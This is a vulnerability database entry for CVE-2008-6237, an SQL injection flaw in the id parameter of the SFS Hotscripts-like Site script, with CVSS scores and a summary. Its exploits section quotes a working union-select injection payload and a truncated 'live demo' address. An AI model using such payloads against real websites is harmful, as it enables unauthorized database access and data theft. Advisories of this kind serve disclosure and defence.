7.5
CVSSv2

CVE-2008-6237

Published: 23/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in software-description.php in Scripts For Sites (SFS) Hotscripts-like Site allows remote malicious users to execute arbitrary SQL commands via the id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

scripts-for-sites hotscripts-like site -

Exploits

-=====================================- Application : SFS EZ Software Risk : High FOund By: x0r -=====================================- Exploit: software/software-descriptionphp?id=-5 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* Live Demo: wwwturnkeyzonecom/demos/software/software-d ...